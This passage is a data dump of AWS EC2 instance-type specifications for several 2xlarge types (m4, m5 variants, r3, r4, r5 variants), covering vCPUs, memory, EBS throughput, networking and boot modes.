'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1000, 'BaselineThroughputInMBps': 125.0, 'BaselineIops': 8000, 'MaximumBandwidthInMbps': 1000, 'MaximumThroughputInMBps': 125.0, 'MaximumIops': 8000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.4, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1000, 'BaselineThroughputInMBps': 125.0, 'BaselineIops': 8000, 'MaximumBandwidthInMbps': 1000, 'MaximumThroughputInMBps': 125.0, 'MaximumIops': 8000}, 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm4.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 
'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.4}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1000, 'BaselineThroughputInMBps': 125.0, 'BaselineIops': 8000, 'MaximumBandwidthInMbps': 1000, 'MaximumThroughputInMBps': 125.0, 'MaximumIops': 8000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2300, 'BaselineThroughputInMBps': 287.5, 'BaselineIops': 12000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 
'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2300, 'BaselineThroughputInMBps': 287.5, 'BaselineIops': 12000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': 
['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1580, 'BaselineThroughputInMBps': 197.5, 'BaselineIops': 8333, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5a.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1580, 'BaselineThroughputInMBps': 197.5, 'BaselineIops': 8333, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 
0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'TotalSizeInGB': 300, 'Disks': [{'SizeInGB': 300, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1580, 'BaselineThroughputInMBps': 197.5, 'BaselineIops': 8333, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5ad.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 
'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 300, 'Disks': [{'SizeInGB': 300, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1580, 'BaselineThroughputInMBps': 197.5, 'BaselineIops': 8333, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'TotalSizeInGB': 300, 'Disks': [{'SizeInGB': 300, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2300, 'BaselineThroughputInMBps': 287.5, 'BaselineIops': 12000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 
'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5d.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 300, 'Disks': [{'SizeInGB': 300, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2300, 'BaselineThroughputInMBps': 287.5, 'BaselineIops': 12000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 
'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 62464, 'TotalSizeInGB': 160, 'Disks': [{'SizeInGB': 160, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1000, 'BaselineThroughputInMBps': 125.0, 'BaselineIops': 8000, 'MaximumBandwidthInMbps': 1000, 'MaximumThroughputInMBps': 125.0, 'MaximumIops': 8000}, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r3.2xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 62464}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 160, 'Disks': [{'SizeInGB': 160, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'EbsInfo': {'EbsOptimizedSupport': 'supported', 
'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1000, 'BaselineThroughputInMBps': 125.0, 'BaselineIops': 8000, 'MaximumBandwidthInMbps': 1000, 'MaximumThroughputInMBps': 125.0, 'MaximumIops': 8000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 62464, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1700, 'BaselineThroughputInMBps': 212.5, 'BaselineIops': 12000, 'MaximumBandwidthInMbps': 1700, 'MaximumThroughputInMBps': 212.5, 'MaximumIops': 12000}, 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r4.2xlarge', 'CurrentGeneration': True, 
'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 62464}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1700, 'BaselineThroughputInMBps': 212.5, 'BaselineIops': 12000, 'MaximumBandwidthInMbps': 1700, 'MaximumThroughputInMBps': 212.5, 'MaximumIops': 12000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 65536, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2300, 'BaselineThroughputInMBps': 287.5, 'BaselineIops': 12000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 
'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 65536}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2300, 'BaselineThroughputInMBps': 287.5, 'BaselineIops': 12000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': 
True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 65536, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1580, 'BaselineThroughputInMBps': 197.5, 'BaselineIops': 8333, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5a.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 65536}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1580, 'BaselineThroughputInMBps': 197.5, 'BaselineIops': 8333, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 
'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 65536, 'TotalSizeInGB': 300, 'Disks': [{'SizeInGB': 300, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1580, 'BaselineThroughputInMBps': 197.5, 'BaselineIops': 8333, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5ad.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 
